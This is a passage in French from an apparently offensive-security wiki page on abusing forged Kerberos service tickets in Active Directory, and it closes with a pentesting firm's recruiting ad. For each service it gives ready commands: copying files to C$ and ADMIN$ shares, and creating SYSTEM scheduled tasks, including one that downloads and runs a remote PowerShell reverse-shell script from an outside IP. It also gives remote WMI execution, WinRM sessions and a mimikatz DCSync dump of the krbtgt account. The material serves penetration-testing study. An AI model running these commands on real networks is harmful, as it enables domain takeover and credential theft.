HOST
RPCSS
| | PowerShell Remoting |HOST
HTTP
En fonction du système d'exploitation également:
WSMAN
RPCSS
| | WinRM |HOST
HTTP
Dans certaines occasions, vous pouvez simplement demander: WINRM
| | Tâches planifiées | HOST | | Partage de fichiers Windows, également psexec | CIFS | | Opérations LDAP, y compris DCSync | LDAP | | Outils d'administration à distance du serveur Windows |RPCSS
LDAP
CIFS
| | Tickets Golden | krbtgt | Avec **Rubeus**, vous pouvez demander tous ces tickets en utilisant le paramètre: * `/altservice:host,RPCSS,http,wsman,cifs,ldap,krbtgt,winrm` ## Abus des tickets de service Dans les exemples suivants, imaginons que le ticket soit récupéré en se faisant passer pour le compte administrateur. ### CIFS Avec ce ticket, vous pourrez accéder aux dossiers `C$` et `ADMIN$` via **SMB** (s'ils sont exposés) et copier des fichiers vers une partie du système de fichiers distant en faisant simplement quelque chose comme: ```bash dir \\vulnerable.computer\C$ dir \\vulnerable.computer\ADMIN$ copy afile.txt \\vulnerable.computer\C$\Windows\Temp ``` Vous pourrez également obtenir un shell à l'intérieur de l'hôte ou exécuter des commandes arbitraires en utilisant **psexec**: {% content-ref url="../ntlm/psexec-and-winexec.md" %} [psexec-and-winexec.md](../ntlm/psexec-and-winexec.md) {% endcontent-ref %} ### HÔTE Avec cette autorisation, vous pouvez générer des tâches planifiées sur des ordinateurs distants et exécuter des commandes arbitraires: ```bash #Check you have permissions to use schtasks over a remote server schtasks /S some.vuln.pc #Create scheduled task, first for exe execution, second for powershell reverse shell download schtasks /create /S some.vuln.pc /SC weekly /RU "NT Authority\System" /TN "SomeTaskName" /TR "C:\path\to\executable.exe" schtasks /create /S some.vuln.pc /SC Weekly /RU "NT Authority\SYSTEM" /TN "SomeTaskName" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.114:8080/pc.ps1''')'" #Check it was successfully created schtasks /query /S some.vuln.pc #Run created schtask now schtasks /Run /S mcorp-dc.moneycorp.local /TN "SomeTaskName" ``` ### HÔTE + RPCSS Avec ces tickets, vous pouvez **exécuter WMI dans le système victime** : ```bash #Check you have enough privileges Invoke-WmiMethod -class win32_operatingsystem -ComputerName remote.computer.local #Execute code Invoke-WmiMethod win32_process -ComputerName $Computer -name create -argumentlist "$RunCommand" #You can also use wmic wmic remote.computer.local list full /format:list ``` Trouvez **plus d'informations sur wmiexec** dans la page suivante : {% content-ref url="../ntlm/wmicexec.md" %} [wmicexec.md](../ntlm/wmicexec.md) {% endcontent-ref %} ### HÔTE + WSMAN (WINRM) Avec un accès winrm sur un ordinateur, vous pouvez **y accéder** et même obtenir un PowerShell : ```bash New-PSSession -Name PSC -ComputerName the.computer.name; Enter-PSSession PSC ``` Consultez la page suivante pour en savoir plus sur les différentes façons de se connecter à un hôte distant en utilisant winrm: {% content-ref url="../ntlm/winrm.md" %} [winrm.md](../ntlm/winrm.md) {% endcontent-ref %} {% hint style="warning" %} Notez que **winrm doit être actif et en écoute** sur l'ordinateur distant pour y accéder. {% endhint %} ### LDAP Avec ce privilège, vous pouvez extraire la base de données du contrôleur de domaine en utilisant **DCSync** : ``` mimikatz(commandline) # lsadump::dcsync /dc:pcdc.domain.local /domain:domain.local /user:krbtgt ``` **En savoir plus sur DCSync** dans la page suivante: {% content-ref url="dcsync.md" %} [dcsync.md](dcsync.md) {% endcontent-ref %} (1) (1) (1) (1) (1).png)
Si vous êtes intéressé par une **carrière en piratage** et souhaitez pirater l'impossible - **nous recrutons !** (_maîtrise du polonais écrit et parlé requise_).
{% embed url="https://www.stmcyber.com/careers" %}